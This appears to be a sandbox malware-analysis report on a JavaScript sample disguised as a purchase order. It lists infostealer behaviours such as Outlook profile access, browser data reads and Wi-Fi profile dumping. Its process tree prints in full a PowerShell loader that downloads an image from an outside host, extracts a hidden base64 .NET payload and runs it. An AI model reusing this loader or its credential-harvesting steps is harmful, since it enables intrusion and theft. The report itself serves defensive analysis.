Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 07:59
Static task
static1
Behavioral task
behavioral1
Sample
PURCHASE_ORDER.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
PURCHASE_ORDER.js
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
PURCHASE_ORDER.js
Resource
win11-20240221-en
General
-
Target
PURCHASE_ORDER.js
-
Size
16KB
-
MD5
5173d26d1ad641d21a4e46578c8ce893
-
SHA1
93fa6b081e5ef1b262b2497be0ec7ec8be766c20
-
SHA256
e8c22513e962d944212a2570a29a43fd2e6e90d74913f5db2b5f11443504db1d
-
SHA512
8df3b7d0c5b41675eaae029688c1cf964d58b66c558e16a528d143c3559d60dfcf4da5c44cb7b112a9123e7dc49e460e99cf862f6b743e1691804f78b89b349c
-
SSDEEP
192:P42HOwZ0qshWZ7Va6uadY7Va630PpMx2GjdJZu8HheVkiVUT:P42HO+0ApuPEP+28M8HheWz
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 2 2856 wscript.exe 5 2856 wscript.exe 7 2856 wscript.exe 14 2116 powershell.exe 28 2116 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation wscript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 icanhazip.com 52 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2116 set thread context of 1884 2116 powershell.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe 1884 RegAsm.exe 1884 RegAsm.exe 1884 RegAsm.exe 1884 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1884 RegAsm.exe Token: SeSecurityPrivilege 4432 msiexec.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2856 wrote to memory of 2116 2856 wscript.exe 95 PID 2856 wrote to memory of 2116 2856 wscript.exe 95 PID 2116 wrote to memory of 3276 2116 powershell.exe 104 PID 2116 wrote to memory of 3276 2116 powershell.exe 104 PID 2116 wrote to memory of 3276 2116 powershell.exe 104 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 2116 wrote to memory of 1884 2116 powershell.exe 105 PID 1884 wrote to memory of 2732 1884 RegAsm.exe 107 PID 1884 wrote to memory of 2732 1884 RegAsm.exe 107 PID 1884 wrote to memory of 2732 1884 RegAsm.exe 107 PID 2732 wrote to memory of 2548 2732 cmd.exe 109 PID 2732 wrote to memory of 2548 2732 cmd.exe 109 PID 2732 wrote to memory of 2548 2732 cmd.exe 109 PID 2732 wrote to memory of 720 2732 cmd.exe 110 PID 2732 wrote to memory of 720 2732 cmd.exe 110 PID 2732 wrote to memory of 720 2732 cmd.exe 110 PID 2732 wrote to memory of 2872 2732 cmd.exe 111 PID 2732 wrote to memory of 2872 2732 cmd.exe 111 PID 2732 wrote to memory of 2872 2732 cmd.exe 111 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PURCHASE_ORDER.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482', 'https://uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4848/541.93.321.39//:ptth' , 'desativado' , 'C:\Windows\Temp\' , 'File_Name_JS'))}}2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3276
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1884 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:2548
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵PID:720
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵PID:2872
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4072 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵PID:4300
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4432
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82